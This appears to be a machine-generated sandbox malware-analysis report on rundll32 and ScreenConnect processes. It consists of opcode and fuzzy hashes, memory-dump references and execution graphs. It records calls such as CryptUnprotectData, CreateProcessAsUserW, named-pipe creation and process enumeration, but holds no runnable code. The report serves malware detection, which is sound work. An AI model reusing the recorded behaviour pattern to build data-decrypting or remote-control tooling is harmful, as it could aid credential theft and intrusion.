                                                                  • Instruction ID: b43b7d4d961a270d33617000d3577079374e910b4ad275cd251d0218fc3635e3
                                                                  • Opcode Fuzzy Hash: 8bddeeed49575542d686aa94b3eb0f25689b36792e835e4e8a770c36c7d0dfad
                                                                  • Instruction Fuzzy Hash: F8E026327042044BC7049A2AE850967F7AADBC9724B24407DE00CC3325CD72AC028790
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bc6034cef69cb96a7287a8bc5d5c8753c470db0394bea058d17d32a540fb3205
                                                                  • Instruction ID: 0a842e817459c0f6155da03d2a7692a2482bca8ba62c6179f2dcd8b13e73e3ea
                                                                  • Opcode Fuzzy Hash: bc6034cef69cb96a7287a8bc5d5c8753c470db0394bea058d17d32a540fb3205
                                                                  • Instruction Fuzzy Hash: C1E080B0905348BFCB51DFB4E9525DD7FB5DB16204B1044DAD405D7383EA305F069762
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 319195716e2e33e43adfe2586aef3b70ef5a824781e7d91ec50cff9732ac9c56
                                                                  • Instruction ID: 8ce32845efafe22f207899775455d25bf48b28a62f1dd91e3fa3b3ff667e6734
                                                                  • Opcode Fuzzy Hash: 319195716e2e33e43adfe2586aef3b70ef5a824781e7d91ec50cff9732ac9c56
                                                                  • Instruction Fuzzy Hash: 7DE0CD713193555FC3019368F8209E57FAD9F0B71070405E7F145CB273C9866C0083E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fa602e87d36ca295d4fbb42190deeba816f7d1efa9af9b4be3501ab0010f9ada
                                                                  • Instruction ID: 59283c4220ce1561a0ad537406083d7b45cf9a96291f601322abbf1df33181dc
                                                                  • Opcode Fuzzy Hash: fa602e87d36ca295d4fbb42190deeba816f7d1efa9af9b4be3501ab0010f9ada
                                                                  • Instruction Fuzzy Hash: BAE01270A0120DEFCB40EFB4E90559DBBFAEB49204B2145E9E849D3340EE715E449B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae70167d9fd8a37fff3be0c6e8bb22898ab5a2c8c68501f02965719762024b47
                                                                  • Instruction ID: a2e99cacd00ba02f97424fdade96371fd1f08ae4e14398a370ef3afbc487a828
                                                                  • Opcode Fuzzy Hash: ae70167d9fd8a37fff3be0c6e8bb22898ab5a2c8c68501f02965719762024b47
                                                                  • Instruction Fuzzy Hash: 5DD0A7313501209BD200531CD4509A93399DB4E715B00486AF60ACB320C993FC0003C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2413975a6dcceef3d3ea4d41ca7741a6690a395dcbd979ac4bea5fd7888ff0a0
                                                                  • Instruction ID: 3d8a2ea86587de26e9e4614c3bca68227a885f7142bc39932309ffb621ecff30
                                                                  • Opcode Fuzzy Hash: 2413975a6dcceef3d3ea4d41ca7741a6690a395dcbd979ac4bea5fd7888ff0a0
                                                                  • Instruction Fuzzy Hash: BDD0A7B2254065DBD611BBA5E9056AA7BB9ABD8360B048033E942573A0CE714C21C3D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3accc3f78866e828ae4b6e488772135f5cdab48b2b399e6b87d4348f91e63171
                                                                  • Instruction ID: a884bcd463b935bce26b0ec4aa54ecd1b0c845180a5dad1d1880b86eb20222ef
                                                                  • Opcode Fuzzy Hash: 3accc3f78866e828ae4b6e488772135f5cdab48b2b399e6b87d4348f91e63171
                                                                  • Instruction Fuzzy Hash: 4DD0A7323141286B52006655DA569AA7BA9F7983A13504433F98283320DD71BC1093D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 63c1e751d429b703df8afc049225b8ffcf431f327fe5efc1b2914b92a3d4bc51
                                                                  • Instruction ID: 1822ee19f30613a5428ad3fd0b1059982d2193bad5d1704d6815cff18c9daca4
                                                                  • Opcode Fuzzy Hash: 63c1e751d429b703df8afc049225b8ffcf431f327fe5efc1b2914b92a3d4bc51
                                                                  • Instruction Fuzzy Hash: 3DD05E70A0120CEFCB40EFB8EA0156DB7FAEB44204B1146E8D409D3380EE316F009B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6a536efa3a595a6df9939e4ce88536fb1fdef67af7e1849f4e9908f375b1747
                                                                  • Instruction ID: 7a218752eaf50fbf557a4c3802e445ddfa03df8ef639a1a94e315de26ddc161f
                                                                  • Opcode Fuzzy Hash: e6a536efa3a595a6df9939e4ce88536fb1fdef67af7e1849f4e9908f375b1747
                                                                  • Instruction Fuzzy Hash: 50D05BB090120CEFCB40DFE4D90155DB7B9DB49204B1045D9D409D3380EA315F049B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1446389705.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_49b0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 656a902492b71f6ed11e7d034c0ddcad0faf9ad3e9acfb4e890f9211a9b1433f
                                                                  • Instruction ID: 411ec3ff6f79695471347053284555f82965e76103a742b2c566f978db520cf9
                                                                  • Opcode Fuzzy Hash: 656a902492b71f6ed11e7d034c0ddcad0faf9ad3e9acfb4e890f9211a9b1433f
                                                                  • Instruction Fuzzy Hash: 8FC02BF3E906009BC3048D0047803FAB3A1FB30323F84C27ACE0449002723D2087B0B4

                                                                  Execution Graph

                                                                  Execution Coverage:11.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:12.7%
                                                                  Total number of Nodes:126
                                                                  Total number of Limit Nodes:7
                                                                  execution_graph 37656 5d40ab7 37657 5d40ad3 37656->37657 37661 5d40cd1 37657->37661 37665 5d40cd8 37657->37665 37658 5d40b61 37662 5d40cd8 37661->37662 37669 5d40094 37662->37669 37666 5d40cf5 37665->37666 37667 5d40094 CryptUnprotectData 37666->37667 37668 5d40d2c 37667->37668 37668->37658 37670 5d40d48 CryptUnprotectData 37669->37670 37671 5d40d2c 37670->37671 37671->37658 37510 4250b30 37511 4250b31 37510->37511 37514 4250b60 37511->37514 37512 4250b55 37515 4250b8d 37514->37515 37516 4250b99 37514->37516 37515->37512 37520 4251176 37516->37520 37529 4251178 37516->37529 37517 4250c15 37517->37512 37521 425119d 37520->37521 37522 4251264 37520->37522 37521->37522 37525 4251176 CryptProtectData 37521->37525 37527 4251178 CryptProtectData 37521->37527 37538 425142b 37521->37538 37542 42513cf 37521->37542 37546 4250e18 37522->37546 37525->37522 37527->37522 37530 425119d 37529->37530 37533 4251264 37529->37533 37530->37533 37534 4251176 CryptProtectData 37530->37534 37535 42513cf CryptProtectData 37530->37535 37536 4251178 CryptProtectData 37530->37536 37537 425142b CryptProtectData 37530->37537 37531 4250e18 CryptProtectData 37532 425148d 37531->37532 37532->37517 37533->37531 37534->37533 37535->37533 37536->37533 37537->37533 37539 425143f 37538->37539 37540 4250e18 CryptProtectData 37539->37540 37541 425148d 37540->37541 37541->37522 37543 42513e3 37542->37543 37544 4250e18 CryptProtectData 37543->37544 37545 425148d 37544->37545 37545->37522 37547 4251678 CryptProtectData 37546->37547 37549 425148d 37547->37549 37549->37517 37554 58559d0 37555 5855a24 ConnectNamedPipe 37554->37555 37556 5855a60 37555->37556 37557 5856550 37558 585656e 37557->37558 37560 5856587 37558->37560 37563 585669f 37558->37563 37561 585669f CreateFileA 37561->37560 37564 58566bd 37563->37564 37568 5d434e8 37564->37568 37572 5d434d9 37564->37572 37569 5d434fb 37568->37569 37576 5d42614 37569->37576 37573 5d434e8 37572->37573 37574 5d42614 CreateFileA 37573->37574 37575 58565b0 37574->37575 37575->37561 37578 5d43538 CreateFileA 37576->37578 37579 5d4366d 37578->37579 37580 58518d0 37581 5851923 CreateProcessAsUserW 37580->37581 37583 58519b4 37581->37583 37584 5d46088 37586 5d460bc 37584->37586 37587 5d460ac 37584->37587 37585 5d460b5 37592 5d46208 37586->37592 37599 5d461f9 37586->37599 37587->37585 37588 5d46208 4 API calls 37587->37588 37589 5d461f9 4 API calls 37587->37589 37588->37587 37589->37587 37593 5d4623d 37592->37593 37594 5d4622d 37592->37594 37606 5d46388 37593->37606 37613 5d46378 37593->37613 37595 5d46236 37594->37595 37620 5d45020 37594->37620 37595->37587 37601 5d46208 37599->37601 37600 5d4622d 37602 5d46236 37600->37602 37603 5d45020 ProcessIdToSessionId 37600->37603 37601->37600 37604 5d46388 2 API calls 37601->37604 37605 5d46378 2 API calls 37601->37605 37602->37587 37603->37600 37604->37600 37605->37600 37611 5d463b2 37606->37611 37612 5d4639f 37606->37612 37607 5d463a8 37607->37594 37608 5d4651a K32EnumProcesses 37609 5d46552 37608->37609 37609->37594 37611->37612 37623 5d4502c 37611->37623 37612->37607 37612->37608 37616 5d46388 37613->37616 37614 5d463a8 37614->37594 37615 5d4651a K32EnumProcesses 37617 5d46552 37615->37617 37618 5d4502c K32EnumProcesses 37616->37618 37619 5d4639f 37616->37619 37617->37594 37618->37616 37619->37614 37619->37615 37621 5d465c0 ProcessIdToSessionId 37620->37621 37622 5d46633 37621->37622 37622->37594 37624 5d464c8 K32EnumProcesses 37623->37624 37626 5d46552 37624->37626 37626->37611 37550 5856718 37551 5856760 WaitNamedPipeW 37550->37551 37552 585675a 37550->37552 37553 5856794 37551->37553 37552->37551 37627 5850fd8 37628 5850fea 37627->37628 37631 58511e7 37628->37631 37629 585100d 37632 5851210 37631->37632 37636 5853531 37632->37636 37644 5853540 37632->37644 37633 5851250 37633->37629 37637 5853567 37636->37637 37638 5853652 CreateNamedPipeW 37637->37638 37639 58535e8 37637->37639 37643 5853719 37638->37643 37652 5852938 37639->37652 37643->37633 37645 5853567 37644->37645 37646 5853652 CreateNamedPipeW 37645->37646 37647 58535e8 37645->37647 37651 5853719 37646->37651 37648 5852938 CreateNamedPipeW 37647->37648 37649 5853648 37648->37649 37649->37633 37651->37633 37653 5853668 CreateNamedPipeW 37652->37653 37655 5853648 37653->37655 37655->37633

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 339 5853540-58535c6 348 58535d1-58535dd 339->348 349 58535c8-58535ca 339->349 351 58535df-58535e6 348->351 352 58535e8-58535ea 348->352 349->348 351->352 353 58535ec-58535f3 351->353 354 58535f8-5853620 352->354 355 58535f5 353->355 356 5853652-58536aa 353->356 359 5853622-5853627 354->359 360 5853629 354->360 355->354 361 58536b2-5853717 CreateNamedPipeW 356->361 362 58536ac-58536af 356->362 363 585362e-5853643 call 5852938 359->363 360->363 367 5853720-5853741 361->367 368 5853719-585371f 361->368 362->361 365 5853648-585364f 363->365 368->367
                                                                  APIs
                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05853704
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2489174969-0
                                                                  • Opcode ID: d353704188f41e569705d2fec2ee934bde1ce2a8abddec3e12c43a974a5fb9b1
                                                                  • Instruction ID: 836d97b2782a34eab0c9ad4f8ee521b4112464fb1e30c4e6089dcddb9efe1682
                                                                  • Opcode Fuzzy Hash: d353704188f41e569705d2fec2ee934bde1ce2a8abddec3e12c43a974a5fb9b1
                                                                  • Instruction Fuzzy Hash: 5261AF70A043089FDB10CFA9D844B9EBBF6FF88310F14846AE909EB391DB759905CB60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 598 58518d0-5851921 599 5851923-5851929 598->599 600 585192c-5851930 598->600 599->600 601 5851932-5851935 600->601 602 5851938-585194d 600->602 601->602 603 585194f-5851958 602->603 604 585195b-58519b2 CreateProcessAsUserW 602->604 603->604 605 58519b4-58519ba 604->605 606 58519bb-58519e3 604->606 605->606
                                                                  APIs
                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0585199F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessUser
                                                                  • String ID:
                                                                  • API String ID: 2217836671-0
                                                                  • Opcode ID: 634bf059370d3efd33280674693675f9dd433c5054e740f2908c790908c6b636
                                                                  • Instruction ID: d97613e955f17bdab98aab8d13984598fdf77c2b4e4e82722e94552b9c9c34a2
                                                                  • Opcode Fuzzy Hash: 634bf059370d3efd33280674693675f9dd433c5054e740f2908c790908c6b636
                                                                  • Instruction Fuzzy Hash: 9E41337690020ADFCF10CFA9C884ADEBBF2FF48320F15852AE959A7250D775A955CF90
                                                                  APIs
                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 05D40DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: f443e67d4e13c03d1b83d7d63b6f9474f0d5d8801f057a042dd4bb2885d956b8
                                                                  • Instruction ID: c7731c4c61d75ab7d3426cd6a1c0cd5625abcea678a2cf64b5002278c59e4715
                                                                  • Opcode Fuzzy Hash: f443e67d4e13c03d1b83d7d63b6f9474f0d5d8801f057a042dd4bb2885d956b8
                                                                  • Instruction Fuzzy Hash: 0B21877680024ADFCB10CF99C888BEEBBF4FF48310F14845AEA58A7650D335A556CFA1
                                                                  APIs
                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 042516EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2684908351.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_4250000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataProtect
                                                                  • String ID:
                                                                  • API String ID: 3091777813-0
                                                                  • Opcode ID: 1bdcedac13b6b2518dccbffab05fce01ade59104a8822d07421fb1eb53afced9
                                                                  • Instruction ID: d4bbead6f12a06b7b17b2e877e80a9c6ebd2f557ea7250afeb48c2ba348e4da6
                                                                  • Opcode Fuzzy Hash: 1bdcedac13b6b2518dccbffab05fce01ade59104a8822d07421fb1eb53afced9
                                                                  • Instruction Fuzzy Hash: 322145B6C0024A9FDF11CF9AC840BDEBBF1FB48310F148429E919A7210C379A555CFA1
                                                                  APIs
                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 042516EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2684908351.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_4250000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataProtect
                                                                  • String ID:
                                                                  • API String ID: 3091777813-0
                                                                  • Opcode ID: 52ef32408a99d37f607e883dc7ecf52700a2e62668ca8769f5ad4be354ad1011
                                                                  • Instruction ID: aafad31c2a3599dda3248f782a45a64802a41d0585fb6733c15d16ef496506f7
                                                                  • Opcode Fuzzy Hash: 52ef32408a99d37f607e883dc7ecf52700a2e62668ca8769f5ad4be354ad1011
                                                                  • Instruction Fuzzy Hash: CD214876D0024ADFDB10CF9AC844BEEBBF5FB48310F148429E914A7210D379A551CFA1
                                                                  APIs
                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 05D40DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: 7edefe4c3402c1f077d6cab317fdb85b94ba29e4523ecf87e1e0ab99f52aac3d
                                                                  • Instruction ID: cd4290ec2c4366b51b0c6032f7fa913c6b0464945ae3fdc3dc407c2163d6037b
                                                                  • Opcode Fuzzy Hash: 7edefe4c3402c1f077d6cab317fdb85b94ba29e4523ecf87e1e0ab99f52aac3d
                                                                  • Instruction Fuzzy Hash: 772164B680020ADFCB10CF99C845BDEBBF4EB48320F14845AEA28A7710C339A555DFA4
                                                                  APIs
                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 05D40DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: d994edb8b819ba93b2715ab312f081bb5bb7c46502dbd302f713a5c2da591139
                                                                  • Instruction ID: cbb643865d4f053ebeb587df9ad2a419d493b012d9f21e0ec0826e4dd60bff98
                                                                  • Opcode Fuzzy Hash: d994edb8b819ba93b2715ab312f081bb5bb7c46502dbd302f713a5c2da591139
                                                                  • Instruction Fuzzy Hash: C721567680020ADFDB10CF89C944BEEBBF4EB48310F10841AEA58A7710D339A955CFA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 300 5d42620-5d42650 305 5d425e6 300->305 306 5d42652-5d42696 300->306 307 5d425ed-5d42600 305->307 316 5d43538-5d43594 306->316 311 5d42594-5d425e2 307->311 312 5d42602-5d4261b 307->312 311->307 312->316 318 5d43596-5d435bb 316->318 319 5d435e8-5d4366b CreateFileA 316->319 318->319 323 5d435bd-5d435bf 318->323 327 5d43674-5d436b2 319->327 328 5d4366d-5d43673 319->328 325 5d435c1-5d435cb 323->325 326 5d435e2-5d435e5 323->326 329 5d435cd 325->329 330 5d435cf-5d435de 325->330 326->319 335 5d436b4-5d436b8 327->335 336 5d436c2 327->336 328->327 329->330 330->330 331 5d435e0 330->331 331->326 335->336 337 5d436ba 335->337 338 5d436c3 336->338 337->336 338->338
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a7130afe49f43af03a98dba87eaab4f1ae06c114b1dcb47923ca7f097b8820a
                                                                  • Instruction ID: e3bdcfd4479c9796b15eaa7ed6c3a604a2a8a83166e0b9a74976eef8642f75ea
                                                                  • Opcode Fuzzy Hash: 5a7130afe49f43af03a98dba87eaab4f1ae06c114b1dcb47923ca7f097b8820a
                                                                  • Instruction Fuzzy Hash: 90616C719083A99FEB02DFA8D8647CDBBF2BF45304F14846AD4449B2A2D7748445CF95

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 371 5d46388-5d4639d 372 5d463b2-5d463b9 371->372 373 5d4639f-5d463a2 371->373 376 5d463be-5d46402 call 5d4502c 372->376 374 5d4646c-5d46480 373->374 375 5d463a8-5d463b1 373->375 377 5d46446-5d4644f 374->377 378 5d46482 374->378 394 5d46407-5d4640c 376->394 380 5d46451-5d4646b 377->380 381 5d464ac-5d4650e 377->381 382 5d4648e-5d46497 378->382 385 5d46510-5d46518 381->385 386 5d4651a-5d46550 K32EnumProcesses 381->386 385->386 387 5d46552-5d46558 386->387 388 5d46559-5d46581 386->388 387->388 395 5d46412-5d46415 394->395 396 5d46498-5d464a5 394->396 397 5d46484-5d46489 395->397 398 5d46417-5d46444 395->398 396->381 397->376 398->377 398->382
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c3274d821f17585db20a2ff538f26f9db2c2a032eb8429c55d1fecda6a93e9a
                                                                  • Instruction ID: 65a2e65dd35004cffa1c34d8408d768ddb67cf302601f30465fec9fd7a82e9e7
                                                                  • Opcode Fuzzy Hash: 8c3274d821f17585db20a2ff538f26f9db2c2a032eb8429c55d1fecda6a93e9a
                                                                  • Instruction Fuzzy Hash: 8F516C75A007058FDB24CFA9D884AAEBBF1FB88310F14892ED45AE7650D734E945CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 403 5d425c7-5d42600 407 5d42594-5d425c0 403->407 408 5d42602-5d43594 403->408 407->403 411 5d43596-5d435bb 408->411 412 5d435e8-5d4366b CreateFileA 408->412 411->412 415 5d435bd-5d435bf 411->415 419 5d43674-5d436b2 412->419 420 5d4366d-5d43673 412->420 417 5d435c1-5d435cb 415->417 418 5d435e2-5d435e5 415->418 421 5d435cd 417->421 422 5d435cf-5d435de 417->422 418->412 427 5d436b4-5d436b8 419->427 428 5d436c2 419->428 420->419 421->422 422->422 423 5d435e0 422->423 423->418 427->428 429 5d436ba 427->429 430 5d436c3 428->430 429->428 430->430
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05D43655
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 7614ca3bb6d4c1379e10e3f1037acd45c7dce24c0bd6eda7dfc97b7a92317e19
                                                                  • Instruction ID: f2c591390a3fe8510ca723382d89e2ff620636f389c518b4337515f4a944770d
                                                                  • Opcode Fuzzy Hash: 7614ca3bb6d4c1379e10e3f1037acd45c7dce24c0bd6eda7dfc97b7a92317e19
                                                                  • Instruction Fuzzy Hash: 7B517B71D043998FDB02DFA9C894BCEBBF2BF45304F14856AD848AB2A1D7758845CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 453 5d4352d-5d43594 455 5d43596-5d435bb 453->455 456 5d435e8-5d4366b CreateFileA 453->456 455->456 459 5d435bd-5d435bf 455->459 463 5d43674-5d436b2 456->463 464 5d4366d-5d43673 456->464 461 5d435c1-5d435cb 459->461 462 5d435e2-5d435e5 459->462 465 5d435cd 461->465 466 5d435cf-5d435de 461->466 462->456 471 5d436b4-5d436b8 463->471 472 5d436c2 463->472 464->463 465->466 466->466 467 5d435e0 466->467 467->462 471->472 473 5d436ba 471->473 474 5d436c3 472->474 473->472 474->474
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05D43655
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0697d8d4896fd468281e5e6f86dc0f18cf820b5a5bc499cd21c2b9ee08460445
                                                                  • Instruction ID: 695d806e8d25a419cce30a35cfa1c6666c869f34a7886b4477ff2a38fc04fe19
                                                                  • Opcode Fuzzy Hash: 0697d8d4896fd468281e5e6f86dc0f18cf820b5a5bc499cd21c2b9ee08460445
                                                                  • Instruction Fuzzy Hash: 415147B1D003499FDB10CFA9C984B9EBBF2FB48304F24842AE819AB351D7759885CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 431 5d42614-5d43594 433 5d43596-5d435bb 431->433 434 5d435e8-5d4366b CreateFileA 431->434 433->434 437 5d435bd-5d435bf 433->437 441 5d43674-5d436b2 434->441 442 5d4366d-5d43673 434->442 439 5d435c1-5d435cb 437->439 440 5d435e2-5d435e5 437->440 443 5d435cd 439->443 444 5d435cf-5d435de 439->444 440->434 449 5d436b4-5d436b8 441->449 450 5d436c2 441->450 442->441 443->444 444->444 445 5d435e0 444->445 445->440 449->450 451 5d436ba 449->451 452 5d436c3 450->452 451->450 452->452
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05D43655
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: b6c783f96f088cd618196af9ffd9c63075b2bbffe420a8d8987177769992813e
                                                                  • Instruction ID: fbcb4ec9fb930cbd8eff69c958b8d637fe3c1e0094f2c692c57adf7f6f99b36a
                                                                  • Opcode Fuzzy Hash: b6c783f96f088cd618196af9ffd9c63075b2bbffe420a8d8987177769992813e
                                                                  • Instruction Fuzzy Hash: E95137B1D003499FDB10CFA9C984B9EBBF2FB48304F24852AE819AB355D7759885CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 587 58518c8-5851921 588 5851923-5851929 587->588 589 585192c-5851930 587->589 588->589 590 5851932-5851935 589->590 591 5851938-585194d 589->591 590->591 592 585194f-5851958 591->592 593 585195b-58519b2 CreateProcessAsUserW 591->593 592->593 594 58519b4-58519ba 593->594 595 58519bb-58519e3 593->595 594->595
                                                                  APIs
